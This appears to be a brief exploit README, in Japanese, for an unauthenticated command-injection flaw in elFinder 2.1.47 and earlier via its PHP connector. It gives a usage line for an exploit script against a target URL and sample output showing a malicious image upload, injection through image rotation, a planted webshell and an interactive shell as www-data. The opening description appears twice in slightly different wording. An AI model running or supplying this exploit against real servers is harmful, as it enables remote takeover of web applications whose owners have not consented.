
PHPコネクタコンポーネントを介した elFinder <= 2.1.47 のコマンドインジェクションの脆弱性。Webサーバーユーザーとして認証なしでリモートコード実行が可能になります。
elFinder <= 2.1.47 における、PHP コネクタコンポーネントを介したコマンドインジェクションの脆弱性。Web サーバーユーザーとして未認証のリモートコード実行が可能になります。
python3 exploit.py http://TARGET
$ python3 exploit.py http://10.10.10.10/elFinder
[*] Uploading malicious image...
[*] File uploaded, hash: l1_U2VjU2lnbmFsLmpwZw
[*] Triggering command injection via image rotation...
[*] Checking for webshell...
[+] Pwned!
[+] Interactive shell (Ctrl+C to exit)
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)